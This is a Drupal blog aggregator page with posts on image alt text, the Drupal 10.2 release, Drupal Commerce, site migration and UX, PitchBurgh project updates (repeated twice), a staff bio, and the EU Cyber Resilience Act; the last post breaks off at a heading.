Upgrade Your Drupal Skills

We trained 1,000+ Drupal Developers over the last decade.

See Advanced Courses NAH, I know Enough
Dec 15 2023
Dec 15

Authored by: Nadiia Nykolaichuk.

We firmly believe that website accessibility is of utmost importance. Which is why we are kicking off a series of articles dedicated to the elements it cannot exist without. Of course, accessibility embraces a myriad of aspects, but we decided to choose some of the most essential ones and dig a little deeper into how each of them works. 

Accessibility element #1 in our collection will be alt text. Adding proper alt text to images is one of the vital accessibility tips for content editors, and the right CMS setup plays a huge role as well. In this post, we’ll discuss everything about alt text: what it is for, how it’s managed in the Drupal CMS, and how some top-notch contributed modules can enhance its management and add more options. 

Alt text: the definition and the mission

Alt text (short for “alternative text,” also known as an alt tag or description) is a text snippet that is added to an image on a web page and describes what’s in the image. It’s meant for providing a textual alternative to visual content that can be used by assistive technology and search engines. An ideal alt description is clear and concise, avoids non-essential details, uses keywords but is not overstaffed with them, and avoids redundant text like “image of” or “photo of”.

From a technical standpoint, the alternative text is contained in the alt attribute that is used as part of the (image) element of a web page’s HTML code. You can always check it by right-clicking an image and choosing “Inspect.” 

An example of an image alt text in the source code of a web page.An example of an image alt text in the source code of a web page.

Why alternative text has a pivotal importance:

  • First and foremost, it is an accessibility requirement meant to help people with visual impairments understand what the image conveys. These users rely on screen-reading software to navigate the web, and when a screen reader encounters an image with alternative text, it reads it aloud. If it’s not provided, a screen reader will just read out the file name or a default message like "Image" or "Graphic." 
  • Alternative text is displayed in place of an image that wasn’t able to load. This comes in handy with slower internet connections. It is important both from the standpoint of web accessibility and overall user experience. 
  • We must also mention the positive impact of alt text on SEO. It allows search engines to better crawl websites, categorize its own collections of images, and rank websites higher in image search results, helping their teams drive more organic traffic.

Alt text in Drupal: all you might need to know

Drupal is a great illustration of how a CMS can be the ideal platform for content editing teams when it comes to smooth alternative text management. It must be noted that Drupal made significant improvements in terms of accessibility and compliance with web standards, including proper handling of alt descriptions. 

There are several ways in Drupal to add images to web pages. Let’s take a closer look at how alternative text is managed through each of them, how the modern Drupal functionalities help, and what are some additional ways to enhance the process even further.

Adding alt text to an image field

Whenever you add an image via a field on the content editing form, you need to fill out its “Alternative text.” Starting with the Drupal 8.0 release, it’s impossible to skip this step. At that point, alt text became required for image fields out of the box as part of overall accessibility improvements in Drupal. This eliminates the risk of human error and makes sure this important accessibility element never gets overlooked.

Adding required alt text to an image field in Drupal.Adding required alt text to an image field in Drupal.

Under the hood, image fields in all content types or other entity types now have the “Enable alt field” and “Alt field required” boxes selected by default. These settings can be found in Structure > [Your entity type] > Manage fields. As you click to edit an image field and scroll to the bottom of the page, you’ll see the selected checkboxes. At first, when alt text became required, this only worked for the built-in entity types, so it’s very useful to check these settings for all your image fields and make sure all the right checkboxes are enabled.

The settings for alt text in a Drupal image field.The settings for alt text in a Drupal image field.

Adding alt text in CKEditor

You can also add images to your content inline in the WYSIWYG editor. The interface for managing alternative text became significantly different in the new version of the text editor — CKEditor 5 (you might also want to check out an article that compares CKEditor 5 vs. CKEditor 4 for the key content editing features). So here is how alt text management looks in each version:

  • CKEditor 4

Adding alt text. As you upload an image from your computer, you see a modal dialog where you fill out the “Alternative text” field. As you hover your mouse over the field, it’ll show a “Please fill out this field” tooltip. Once you’ve added the alt description, click “Save.” 

The dialog box for adding alt text to an image via in CKEditor 4.The dialog box for adding alt text to an image via in CKEditor 4.

Is alt text required? If you try to save an image without it, you’ll see an error message in the dialog box saying that alternative text is required, and that only in rare cases should this field be left empty. It will also give you a hint to create empty alternative text by entering two double quotes without any content. That’s the current workflow in CKEditor 4. 

An error message about the required alt text in CKEditor 4.An error message about the required alt text in CKEditor 4.

Editing alt text. If you need to change the alternative text afterwards, click on the image and then on the “Image” button on the CKEditor toolbar to see this dialog box again.

Editing the alt text of an image in CKEditor 4.Editing the alt text of an image in CKEditor 4.
  • CKEditor 5

Adding alt text. When uploading an image from your computer, you see a balloon panel called “Text alternative” with a green checkmark and a red cross mark. Type your alt text and click the green checkmark to add it, or click the red cross mark to cancel. If an image is purely decorative, it’s not necessary to add alternative text to it, so you can toggle the “Decorative image” option on.

Adding alt text to an image via the balloon panel in CKEditor 5.Adding alt text to an image via the balloon panel in CKEditor 5.

Is alt text required? If you skip adding it when saving an image that’s not marked as decorative, CKEditor 5 will be showing you an “Add missing alternative text” warning about it all the time in the corner of an image.

The “Add missing alternative text” warning in CKEditor 5.The “Add missing alternative text” warning in CKEditor 5.

Editing alt text. If you need to change the previously added alt text, click on the image and its dedicated toolbar will appear right above it. Find the “Change image alternative text” icon on it and you’ll be able to make your changes.

Editing alt text via the dedicated toolbar for images in CKEditor 5.Editing alt text via the dedicated toolbar for images in CKEditor 5.

Note on the difference between alt text and image captions

CKEditor 5’s dedicated toolbar for images also includes the option to add image captions. A caption is a brief text accompanying an image that provides additional context, explanation, or commentary about the image. Captions are visible to users but, unlike alternative text, captions are not automatically read by screen readers. This means they cannot be a replacement for alt text, so it’s a good idea to use both.

Adding an image caption in CKEditor 5.Adding an image caption in CKEditor 5.

Adding alt text to images in Media Library

A perfect way to store your images for further reuse is Drupal’s Media Library that became part of the Drupal core in its 8.6 release. Images are stored in the Media Library as media entities with a Media image field type. The alt settings such as “Enable alt field” and “Alt field required” can be found in Structure > Media types > Image > Manage fields > Edit. Out of the box, alt is required for media entities.

So as you go to Content > Media > Add media > Image, and upload an image to the Media Library, you must fill out the “Alternative text” field. 

Adding required alt text while uploading an image to the Media Library.Adding required alt text while uploading an image to the Media Library.

Next, whenever you want to embed images in CKEditor from the Media Library via the Media Library button on the CKEditor toolbar, you’ll no longer need to add an alt description. If you need to override the alt, you can:

Editing alt text for an image that’s been uploaded from the Media Library in CKEditor 4.Editing alt text for an image that’s been uploaded from the Media Library in CKEditor 4.
  • Click on the image and then click the “Override media image alternative text” icon on dedicated toolbar (for CKEditor 5)
Editing alt text for an image that’s been uploaded from the Media Library in CKEditor 5.Editing alt text for an image that’s been uploaded from the Media Library in CKEditor 5.

Contributed Drupal modules that enhance the alt text management

In some cases, you might want to rely on some additional tools to make sure all your website’s images have proper alternative descriptions. This can be especially relevant for content-heavy websites, for websites with user-generated content, for websites that are undergoing accessibility optimization, and so on. Here are some examples of contributed Drupal modules that might help you generate alt descriptions automatically, check where they are missing, and more.

Automatic Alternative Text

Let’s start with a module for automatic alt text generation in Drupal. The Automatic Alternative Text module generates alt text for images with the help of Microsoft Azure Cognitive Services API or Alttext.ai. You’ll be able to select one of those automatic image description engines in the module’s settings. The module can create descriptions in complete English sentences, show the percentage of confidence about the correct description, intelligently generate image thumbnails, and more. There is also a submodule that automatically translates the generated text into languages other than English. 

The settings for the Automatic Alternative Text module.The settings for the Automatic Alternative Text module.Automatic alt generation by the Automatic Alternative Text module.Automatic alt generation by the Automatic Alternative Text module.

Decorative Image Widget

The Decorative Image Widget adds a “Decorative” checkbox that a user must check if they want to leave the alternative text field empty. If an image is marked as decorative, it will be hidden from screen readers.

A “Decorative” checkbox for images provided by the Decorative Image Widget module.A “Decorative” checkbox for images provided by the Decorative Image Widget module.

This functionality works when the alt field is set to ‘not required’ in the image field settings. The “Decorative” checkbox can be easily added or removed in an image field’s widget settings provided by the module. 

Enabling/disabling the “Decorative” checkbox for images.Enabling/disabling the “Decorative” checkbox for images.

Editoria11y Accessibility Checker

The Editoria11y Accessibility Checker module automatically scans your website for accessibility issues, including all kinds of issues with alternative text. Among them are:

  • alternative text is missing
  • it’s too very long
  • a filename is used as alt
  • there are images in links with alt text that describes the image itself rather than the link destination
  • redundant words like “image of” or “photo of” are used in the alt
An example of redundancy in alt text discovered by the Editoria11y Accessibility Checker module.An example of redundancy in alt text discovered by the Editoria11y Accessibility Checker module.

Final thoughts

Providing alt text for images is like an essential piece of the puzzle that helps your Drupal website be genuinely accessible and compliant with the standards. Ensuring accessibility is a complex task, so whenever you need professional help with it, you are welcome to contact our experienced Drupal experts

Dec 15 2023
Dec 15

New in Drupal 10.2

The second feature release of Drupal 10 improves content modeling, block management, menu and taxonomy organization, and permission administration. New options to sanitize file names make it possible to clean up the names of uploaded files, and media item revisions now have a dedicated user interface.

Easier content management

10.2 improves the user experience for managing several types of content:

  • Field types for new fields are visually listed instead of a simple select list. Settings for fields are now all included on one form.
  • Menu items and taxonomy terms have a dedicated option to add a child item, which makes item placement easier.
  • Media items now have a dedicated user interface to review and manage older revisions.
  • CKEditor's language selector can now be configured to only show languages supported on the site.

More flexible block placement

A user interface has been added to show or hide each block based on the HTTP response status, so that specific blocks can be added or removed when the page is not found (404) or access is denied (403).

New built-in file name sanitization options

The functionality of one of the most popular contributed modules is now included in core! Replace whitespace in file names, transliterate text, convert to lowercase, and more.

Faster permission management

The permissions page now comes with a filter on the top to make it easy to find the permission you planned to adjust.

Performance improvements

Drupal 10.2 includes numerous performance improvements for content rendering and HTTP responses, as well as improved caching APIs.

Works on the latest PHP

PHP 8.3 was released three weeks ago, and Drupal 10.2 is already compatible with it.

Modern language feature: PHP attributes

Drupal core has started adopting PHP attributes, a modern PHP language feature, to provide better developer experience for plugin annotations. Contributed and custom code can begin adopting this improved API for their plugins, and Block and Action plugins can all be converted to the new API.

Built-in project news updates

To help keep you up to date with project news, the Announcements Feed module became stable and is now installed by default with the standard profile.

Help topics now in Help module

The experimental Help topics module is now marked as deprecated and all functionality has been integrated into the core Help module.

Developer experience improvements

Drupal 10.2 comes with a number of developer experience improvements:

  • A PerformanceTestBase was added to support automated testing of performance metrics with support to send OpenTelemetry traces to an open telemetry endpoint.
  • A new DeprecationHelper::backwardsCompatibleCall() method is available that helps write Drupal extensions that are compatible with multiple major versions at once.
  • PHP Fibers support was added to BigPipe and the Renderer, which allows Drupal to potentially run different code while it's waiting for an asynchronous operation to return.
  • Configuration validation was expanded to better support strict testing and make configuration form validation easier to implement.
  • Symfony's autowiring support was adopted for services, based on PHP 8 attributes, making service creation easier.
  • The HTML utility classes and filter system was updated to produce HTML5 syntax instead of XHTML.

Core team updates

Drupal is built by an open source community of collaborators across geographies and organizations. Maintainers assess the work of the community and decide when it's ready to commit to Drupal core. After a period as a provisional committer, Dave Long (at Full Fat Things) was promoted to a full release manager. Kristiaan Van den Eynde (at Factorial) and Adam Bramley (at PreviousNext) have also become core subsystem maintainers. Thanks for stepping up!

Want to get involved?

If you are looking to make the leap from Drupal user to Drupal contributor, or you want to share resources with your team as part of their professional development, there are many opportunities to deepen your Drupal skill set and give back to the community. Check out the Drupal contributor guide, or join us at DrupalCon Portland and attend sessions, network, and enjoy mentorship for your first contributions.

Dec 15 2023
Dec 15

Drupal Commerce is a user-friendly system developed from tens of thousands of modules. It allows you to build a customized e-commerce store that meets all customer requirements. The framework source code is available to each customer, further simplifying use. 
Drupal 7 software was used to create Drupal Commerce. The developers have added essential features, including product management, a convenient shopping cart, fast checkout, and fulfillment. Also, this commerce platform has a built-in content management system, which some of the world's famous companies use. Let's explore the capabilities with our Drupal Commerce tutorial designed for beginners.

How does Drupal Commerce help your business?

A significant difference between Drupal and other e-commerce platforms is the use of open-source software. Unlike Drupal Commerce, standard software does not have a separate framework. Besides the basic functionality known to frequent users, you can also integrate, improve, and extend it. Additionally, other tools can be tested during the further development of the Internet platform. Consider the most popular Drupal Commerce features that can help your business below.

Build an online store using the constructor

As mentioned above, the Drupal 7 management system was the basis for building Drupal Commerce. This helpful feature opens up many opportunities for all users. You can design, improve, develop, and constantly change your online store. 
You have the option to change and customize various features regularly, depending on your preferences. The platform values its customers by offering multilingual functionality and strives to create new user-friendly tools that will meet the specific needs of each user. In addition, your online store on Drupal Commerce has good performance with a large transaction volume and high traffic.

Add products and manage orders easily

Drupal Commerce systems are multi-tasking tools for performing various actions on your online store platform. You can quickly add new products, edit product descriptions, create large catalogs of existing products, and customize displays and attributes. The types of products sold are not limited. 
Thus, you can sell courses, downloadable information products, subscription services, or other physical goods. E-commerce with Drupal users can independently set and change pricing rules, including regular promotions, discounts, and additional coupons. 

Fast checkout process

An easy-to-use and functional shopping cart is essential when placing an order for any customer. Drupal Commerce provides many handy tools to change the status of your purchases, a wide range of shipping methods, and other additional modules for adding statues.
A simple checkout form also increases the likelihood of a customer purchasing from an online store. They see only the most essential points of the form, and you can regularly change and improve this page. E-commerce with Drupal offers a convenient process for paying for products and calculating prices and taxes. Moreover, it supports single-page and multi-page checkout and includes VAT for worldwide shipping.

Payments and integrations

Drupal Commerce allows the integration of many payment systems, including credit cards, for the ultimate customer experience. You can access free downloads for the most popular payment systems, such as PayPal or Authorize.Net.
Drupal Commerce users can also integrate other additional tools into their online store. The most common options are modules for shipping services, marketing, reporting, payment processing, analytics, and others. 
Thanks to these modules, you can integrate well-known and valuable tools such as Xero software, Amazon Pay, Google Analytics, and MailChimp. Customers can connect their accounts to social networking sites like Twitter, Facebook, and Pinterest.

Customer Service

Paid platforms that do not provide access to the source code have a large support service that promptly provides the services the client needs. It is justified by the existence of a subscription and regular payment for using the software. 
However, Drupal Commerce offers user-friendly documentation guides for all employees involved in the website's operation. Your customers can also use the Q&A forum for quick feedback and communication.

Is Drupal good for small E-commerce businesses?

An online store with Drupal Commerce is a unique option that will stand out from the competition with its uniqueness and user experience. It is great for small businesses. 
First, you create a small store and sell a few niche products. Subsequently, when your small business expands, you choose Drupal, which allows you to improve the website without having to do it all over again. It will be an excellent investment in the future of your business, as will the purchase of a more powerful machine that will last for many years.

Why should I build an E-commerce website with Drupal?

The status of online stores has grown significantly over the past few years. At first glance, this has led to a decrease in income for small and medium-sized business owners. A PNAS survey showed that more than 40% of the 5,500 companies in the small business network were forced to close or suspend their work. 
On the other hand, the Internet has saved many businesses from total bankruptcy and allowed entrepreneurs to continue their sales online. After 2020, online stores have increased their income several times, and this area continues to develop daily. In the next 5 years, experts predict an increase in earnings among brands and companies with platforms for selling goods or services. 
Clients appreciate well-designed websites with modern interfaces that make the user experience even more convenient. They are willing to spend much money to get a quality product. Therefore, an online store that is available on multiple devices is a great investment in the future of your business.

Checklist for creating a Drupal eCommerce Store

This article is not a detailed guide to launching an online store because, in this case, it would be very long. In addition, each client has their vision of the future online store so all customizable features will differ, depending on their preferences. Despite this, we have a small checklist with general information for beginners who want to do the basic settings themselves.
There are several different ways to create an online store with Drupal. To start an introduction to Drupal Commerce, you need to do the following:

  • First, all business owners must choose the right web hosting provider. 
  • Сhoose a web hosting company and install Drupal.
  • Select the "quick start" route and complete the installation manually to speed up the process.
  • After starting the building, you should enter key data such as country of residence, username, password, and site name.
  • Then log in and study the user interface in more detail.
  • Browse the directory, select the theme you like, then install it.
  • Install the Drupal Commerce module.
  • Add a few more submodules: cart, order, checkout, price, payment, product, and store. 
  • Select the default store and one or more payment options. 
  • Install commercial delivery modules, which you should enable and configure manually.

After completing all the steps, you can start creating products by adding additional information:

  • product stock-keeping unit (SKU)
  • product images
  • title of each product
  • status (active or disabled)
  • product price

All of the above actions are the basis for a quick site start. In addition, creating an online store with Drupal Commerce is quite complex and requires additional training from the website owner. Users without programming experience may experience difficulties at some stages. What's more, Drupal has quite a few default tools, so you may need a Drupal developer's help to get the best possible platform.

Best Drupal E-Commerce Websites

Thousands of different websites worldwide have already been launched with Drupal Commerce. Let's look at the most famed examples:

Artellite

Artellite is a project for artists and gallery owners that allows them to promote their work to a large market, increase awareness and increase art sales. The Artellite project tries to maintain the individuality of each artist and present them to a broad audience. The Drupal framework is responsible for all essential operations on the website, including customer service and the transmission of up-to-date information. The online store owners are in total control of it and are engaged in promotion with the help of additional advertising.

Cartier

Cartier is a famous and elite French brand specializing in luxury accessories, watches, and other jewelry. The owners decided to create their online store with Drupal Commerce, paying particular attention to sophisticated design. The website has convenient functionality for placing a large number of products, as well as a simple checkout process. 

Verizon

Verizon is engaged in the marketing and promotion of electronic devices. They complete developing a new product, make a detailed presentation, and prepare to launch it on the market. The website had to emphasize the uniqueness of each product's identity and ensure that copyrights were preserved. Drupal Commerce CMS was the perfect solution to raise brand standards and ensure complete use security. In the final versions of the Internet platform, redesigned templates were used, which reduced the time to create the following product.

Is Drupal Commerce the right choice for you?

Choosing the right e-commerce platform is essential in setting up your online store, so you should carefully consider what is best for your business. It is critical to evaluate whether the software can meet all your requirements for the future of the website. Drupal Commerce gives you total control over your online store and allows you to track all transactions, and is scalable. It offers a wide range of customizations that will allow you to create a unique online store that highlights the quality of your product.
An online store is successful when people can easily find and order products. Drupal will be a great decision since it offers all the tools necessary to promote your products, such as SEO product optimization and convenient content addition. Additionally, your customers will appreciate the quick and secure checkout process since it will take just a few minutes. Build a successful online shop with the help of the Drupal commerce expert!

Dec 14 2023
Dec 14

Over the past several months, much of the focus within the Drupal community has concerned the imperative of Drupal migration. Between the Nov. 1, 2023 end of life for Drupal 9, and the announcement at DrupalCon last Spring that Jan. 5, 2025 was the final, final end-of-life date for Drupal 7, there has been a steady stream of messaging concerning the Why, the When, and the How of upgrading to Drupal 10

AMA Drupal 10 webinar on demand

It’s all true, but lost in all of the "have-to's" concerning transitioning to this best-ever version of Drupal, it’s easy to lose sight of the incredible opportunity inherent in a Drupal migration.

Migration provides a prime opportunity to think strategically about your site and how the architecture, design, and user experience can be better aligned with current objectives and branding.

Redefining Your Digital Presence

More so than ever before, web experiences represent a defining digital presence. The stakes for getting it right are high. What proved to be the right approach a a few years ago, might be inching toward becoming out of sync with user expectations. 

Keep in mind, users form rapid-fire impressions about your organization and your website the second they land on a page:

  • Am I going to engage with this site?
  • Does it contain the information that I need?
  • Should I keep scrolling?
  • Do I want to click on this link?
  • Is this interface going to be easy or trip me up into some frustrating sort of loop?
  • Should I just order now?
  • Do I want more information?
  • Where else can I click that looks interesting?

Expertise Plus Empathy

Getting into alignment with user expectations calls for a deep level of inquiry along with a complex mix of empathy for users, elimination of assumptions, and user journey mapping. At Promet Source, it’s what we call Human Centered Design, and it serves as the foundation for user experience design that that optimizes first impressions, maintains engagement, and drives organizational goals. 

Fact is, a depth and breadth of effort and expertise factors into the creation of engaging web experiences that require minimal effort on the part of user. Great UX is a multi-layered process, which incorporates the following objectives. 

Convey Your Brand Story with Intention

Determine what it is that sets your organization apart, and ensure that your messaging, tone, and brand guidelines seamlessly align. Empathy to the fact that visitors to your site are bombarded with more messaging every day than they can ever hope to absorb, will strengthen your resolve to create refreshing web experiences that offer a break from the clutter.

Even if—especially if—the subject matter is complex, focus on connecting the content to the distinct needs of your audience. 

Establish and Adhere to Consistent Standards

Clearly understood guidelines for brand colors, fonts, and all stylistic considerations, and how they are to be used across your site, drive a consistent user experience with clear expectations. Consistency provides a mental model for similar patterns, which facilitates navigation.  

Monitor Site Performance

Sites that respond efficiently and pages that load rapidly are a significant factor in a positive user experience. Expectations are high and patience is low in the current digital environment. In fact, a slow-loading website is a source of lost business. Visitors tend to stop engaging with a site if images take too long to load.

Build Information Architecture Around User Journeys

Too often, the information architecture of a site is based loosely on an internal organization chart, or what seems to make sense to the development team, or simply what appears to be standard practice. There are multiple approaches, but a deeper dive into user preferences and what makes the most sense to them is guaranteed to produce valuable insights

Optimize for Mobile

Recent studies reveal that mobile devices account for more than half of all web traffic worldwide, and the upward trend is continuing. Mobile optimized websites, however, are lagging far behind. Mobile optimization is no longer a nice-to-have. It’s an urgent business imperative. 

Ensure Web Accessibility Compliance

Whether or not your site is legally required to do so, adherence to web accessibility guidelines is simply the right thing to do. Recent CDC reports indicate that fully 25 percent of the population has a disability of some sort. More so than ever before, online experiences represent an essential link to the outside world. Creating a site that works for people with disabilities also means that it works better for everyone, at every ability level.

When online experiences consistently spark a sense of "Why can’t our site do that?" or "Why doesn’t our site look more like this?" It’s time take action. Your site can step up and serve as a strategic driver in an environment in which your web presence is an increasingly defining factor for your organization, your brand, and your values.

Shepherding the transformation of websites from a source of frustration, or simply a functional presence, to an intentional experience that ignites new digital possibilities is what we do here at Promet Source. Check out our recent work!

Dec 14 2023
Dec 14

The year is coming to a close and activity is already ramping down as we approach the Christmas festivities, so this month my PitchBurgh update will cover November and December.

But, before I jump into those updates, and as we are reaching important milestones and PitchBurgh is proving its value to Drupal and the community, let me highlight the importance of the companies that have made PitchBurgh possible with their funding, without whom anything of this would have been possible. Those companies are:

As I mentioned, PitchBurgh projects are crossing some important milestones, reaching midpoint and important milestones, and some are even getting to the end of the projects themselves. Let’s cover some important updates from the past weeks:

Access Policy (Kristiaan Van den Eynde / Factorial)

Original goal: Convert the Flexible Permissions module into core code. This will allow for any access policy to be translated into a set of permissions so that access checks can run

Kristiaan’s work on Access Policy API got merged https://www.drupal.org/project/drupal/issues/3376843

This was a relatively complex project, not just because of the technical side, but also because of what it did imply, in terms of communication and coordination with the different people involved, and the fact that it needed approval from the core team to get this work committed into Core.

The big concern with this PitchBurgh project, as well as the JSON API one, was preventing the work from getting stuck waiting for approvals and merges for months, having the investment and all the work done and sitting there for those long months.

So, seeing how this project is the first to cross the line and get merged to core, is not just a relief, but proof that we can get complex things done as a community. It just takes a little bit of organization and communication between all parties involved, in this case the Drupal Association was the one ensuring that this communication and updates were happening often.

This project was finally committed on 17 November 2023 and will be in Drupal 10.3. You can watch a video/demo of the project here. We are now working to ensure that Drupal core itself also implements the new API by the time 10.3 is released.

Decoupled Layout Builder (PreviousNext)

Original goal: By rewriting [Layout Builder] using React. We’ll design an API that describes the future state of how a Decoupled Layout Builder could work, dramatically enhancing the content editor experience and in turn, bringing Drupal into the modern era of Web UX

Decoupled LB reached project mid point, so right now the work is being reviewed before the funds get released for this part of the project.

You can read all the updates and the rest of the information of the project on their Drupal.org issue:  https://www.drupal.org/project/drupal/issues/3375422  

You can also read the project wrap up here.

Drupal API (Brian Perry / Pantheon)

Original goal: [...] combine the best of existing Drupal API clients into a set of utilities that can both address common use cases with little configuration, and also be extended to support the needs of a diverse JavaScript ecosystem

It has been an eventful month for the Drupal API Client. 

Reaching a big milestone for the project, we’ve published a 0.1.0 release on npm which represents our Vertical Slice POC. Now that we have a small sample of the client out in the real world, we’ve created an issue for soliciting feedback from the community. Any feedback small or large would be extremely helpful for the project. We’ve also been spreading the word through an ‘Update on the Drupal API Client’ blog post and a session at New England Drupal Camp.

We are also happy to announce that coby.sher and pratik_kamble have joined the project as maintainers. They both played a critical role in making our POC a reality and we’re excited to have their leadership going forward.

As we gather feedback, we’ll continue work on the JSON:API Client 1.0 release meta issue. We could still use contributors. If you’d like to participate, join us in the #api-client channel in Drupal Slack.

Gutenberg in Drupal (Frontkom)

Original goal: Streamline the implementation of core Gutenberg library in Drupal Gutenberg to allow more frequent and easy updates. Improve Integration with Drupal

Gutenberg project is progressing well. After the different conversations and alignments with the team in Automattic, there is a date for the workshop and a provisional agenda. Here is a sneak peak at said agenda:

  • In depth go-through of how we built Drupal Gutenberg
  • The Wordpress build scripts
  • Handling permissions within Gutenberg
  • Short term structured data with JSON field
  • Possible long term structured Gutenberg
  • Gutenberg for single field editing
  • Collaborative editing

Mentor the Mentor

The first-time contributor workshop is scripted, templated, and ready for another round of testing. As new initiatives arise, they have been added to the template in the Drupal Initiatives section.

AmyJune has recruited a mentor to deliver the 2-hour training version at Florida DrupalCamp in February. They will test the script for timing and determine how much room should be set aside for demos.

In the last Event Organizer's Working Group Slack meetings, several camps expressed interest in using the workshop slides during their contribution events. The goal is to have documentation that explains how to tailor the slides for a specific event.

PitchBurgh so far in numbers

Across each of our projects we've paid out a total of 38,037.75 for milestones achieved, with 2 projects already finished, one that has crossed midpoint, and the rest advancing at a good pace.

Dec 14 2023
Dec 14

The year is coming to a close and activity is already ramping down as we approach the Christmas festivities, so this month my PitchBurgh update will cover November and December.

But, before I jump into those updates, and as we are reaching important milestones and PitchBurgh is proving its value to Drupal and the community, let me highlight the importance of the companies that have made PitchBurgh possible with their funding, without whom anything of this would have been possible. Those companies are:

As I mentioned, PitchBurgh projects are crossing some important milestones, reaching midpoint and important milestones, and some are even getting to the end of the projects themselves. Let’s cover some important updates from the past weeks:

Access Policy (Kristiaan Van den Eynde / Factorial)

Original goal: Convert the Flexible Permissions module into core code. This will allow for any access policy to be translated into a set of permissions so that access checks can run

Kristiaan’s work on Access Policy API got merged https://www.drupal.org/project/drupal/issues/3376843

This was a relatively complex project, not just because of the technical side, but also because of what it did imply, in terms of communication and coordination with the different people involved, and the fact that it needed approval from the core team to get this work committed into Core.

The big concern with this PitchBurgh project, as well as the JSON API one, was preventing the work from getting stuck waiting for approvals and merges for months, having the investment and all the work done and sitting there for those long months.

So, seeing how this project is the first to cross the line and get merged to core, is not just a relief, but proof that we can get complex things done as a community. It just takes a little bit of organization and communication between all parties involved, in this case the Drupal Association was the one ensuring that this communication and updates were happening often.

This project was finally committed on 17 November 2023 and will be in Drupal 10.3. You can watch a video/demo of the project here. We are now working to ensure that Drupal core itself also implements the new API by the time 10.3 is released.

Decoupled Layout Builder (PreviousNext)

Original goal: By rewriting [Layout Builder] using React. We’ll design an API that describes the future state of how a Decoupled Layout Builder could work, dramatically enhancing the content editor experience and in turn, bringing Drupal into the modern era of Web UX

Decoupled LB reached project mid point, so right now the work is being reviewed before the funds get released for this part of the project.

You can read all the updates and the rest of the information of the project on their Drupal.org issue:  https://www.drupal.org/project/drupal/issues/3375422  

You can also read the project wrap up here.

Drupal API (Brian Perry / Pantheon)

Original goal: [...] combine the best of existing Drupal API clients into a set of utilities that can both address common use cases with little configuration, and also be extended to support the needs of a diverse JavaScript ecosystem

It has been an eventful month for the Drupal API Client. 

Reaching a big milestone for the project, we’ve published a 0.1.0 release on npm which represents our Vertical Slice POC. Now that we have a small sample of the client out in the real world, we’ve created an issue for soliciting feedback from the community. Any feedback small or large would be extremely helpful for the project. We’ve also been spreading the word through an ‘Update on the Drupal API Client’ blog post and a session at New England Drupal Camp.

We are also happy to announce that coby.sher and pratik_kamble have joined the project as maintainers. They both played a critical role in making our POC a reality and we’re excited to have their leadership going forward.

As we gather feedback, we’ll continue work on the JSON:API Client 1.0 release meta issue. We could still use contributors. If you’d like to participate, join us in the #api-client channel in Drupal Slack.

Gutenberg in Drupal (Frontkom)

Original goal: Streamline the implementation of core Gutenberg library in Drupal Gutenberg to allow more frequent and easy updates. Improve Integration with Drupal

Gutenberg project is progressing well. After the different conversations and alignments with the team in Automattic, there is a date for the workshop and a provisional agenda. Here is a sneak peak at said agenda:

  • In depth go-through of how we built Drupal Gutenberg
  • The Wordpress build scripts
  • Handling permissions within Gutenberg
  • Short term structured data with JSON field
  • Possible long term structured Gutenberg
  • Gutenberg for single field editing
  • Collaborative editing

Mentor the Mentor

The first-time contributor workshop is scripted, templated, and ready for another round of testing. As new initiatives arise, they have been added to the template in the Drupal Initiatives section.

AmyJune has recruited a mentor to deliver the 2-hour training version at Florida DrupalCamp in February. They will test the script for timing and determine how much room should be set aside for demos.

In the last Event Organizer's Working Group Slack meetings, several camps expressed interest in using the workshop slides during their contribution events. The goal is to have documentation that explains how to tailor the slides for a specific event.

PitchBurgh so far in numbers

Across each of our projects we've paid out a total of 38,037.75 for milestones achieved, with 2 projects already finished, one that has crossed midpoint, and the rest advancing at a good pace.

Dec 13 2023
Dec 13

Michael E. Meyers joined Tag1 Consulting as Managing Director in 2017 after a decade of working with the team on many projects.

Prior to joining Tag1, Michael was VP of Developer Relations at Acquia, responsible for developer marketing & events, developer relations, and helped launch the developer products group. Michael co-founded & was CTO of NowPublic.com, the first venture-backed Drupal based startup that pioneered citizen journalism. With the help of Tag1, he grew NowPublic into a top 500 website. As CTO of The Clarity Digital Group, which acquired NowPublic, Michael and the Tag1 team rebuilt Examiner.com, the first Drupal-based top 100 Internet site, and the leading contributor to Drupal 7.

Michael has made major contributions to and helped establish Drupal as one of the most successful open source platforms; He’s an advisor to the Drupal Association board and several startup companies.

Dec 12 2023
Dec 12

This post is a follow up on the collaboration between Drupal and other FOSS projects in response to the proposed CRA legislation in the EU. You can read our original joint letter here.

The Drupal Association has continued to participate in weekly calls with other open source projects leaders hosted by Open Forum Europe to discuss the proposed Cyber Resiliency Act (CRA) in the EU. 

The EU legislators are now reconciling several different draft versions of the regulation, and incorporating stakeholder recommendations into a new draft to be advanced through the legislative process.

For the past several months multiple constituent groups within the EU have shared draft versions of the text, soliciting feedback from a variety of stakeholders in government, industry, and the open source community. 

The Open Forum Europe group reviewed several of those draft pieces being reconciled by legislators and offered detailed input and recommendations. One of the major goals was to ensure that the obligations of the CRA don't fall as an undue burden on individuals, non-profits, non-commercial entities, etc., and to forestall unintended consequences that might curtail corporate participation in open source projects. 

The Drupal Association together with the other projects represented in this process strongly believes that Free and Open Source Software is more secure software, and wanted to ensure that this legislation would not stifle the growth of the FOSS movement.

Some of the many areas we focused our recommendations on were: 

Criteria for obligation under the regulation

  • Preventing redundant obligations on open source software caused by use across multiple entities, and ensuring that appropriate obligations for larger entities are not unfairly enforced on smaller ones. 
  • Avoiding tying obligations to the rate of the release cycle which could create a chilling effect on innovation. 
  • Further clarifying that individual contributors as natural persons do not invoke regulatory obligations by participating in open source projects.
  • Encouraging a process that will allow alignment of obligations internationally, so that it will be easier for global communities to meet all their regulatory obligations.

Defining commerciality

  • Improving the text's definition of 'commerciality' - to help ensure that open source projects and the non-profit foundations that support them are not unintentionally punished for the maturity of their development process or the effectiveness of their fundraising activities. 

Risk assessment 

  • Portions of the regulation depend on the concept of risk assessment and the evaluation of security issues 'low' or 'high' risk, 'known vulnerabilities', 'exploitability,' etc. We noted that these definitions must be carefully considered, transparent, standardized, and have room to be refined post-enactment. 
  • We also raised examples of why the method of remediation of known vulnerabilities might vary depending on each project’s approach, suggesting that this should not be too rigidly defined. 

Open Source Stewardship

  • The regulation introduces the concept of an Open Source Steward, a legal entity that can be said to hold responsibility and accountability for an open source project.
  • This creates a category for obligations separate from those of 'software manufacturers' with a level of flexibility appropriate for open source.
  • However, we noted some potential pitfalls in discrepancies between the definition of stewardship and the authority those steward organizations might have over their projects (see for example, collaborative/decentralized projects).

Collaborative/Decentralized Projects

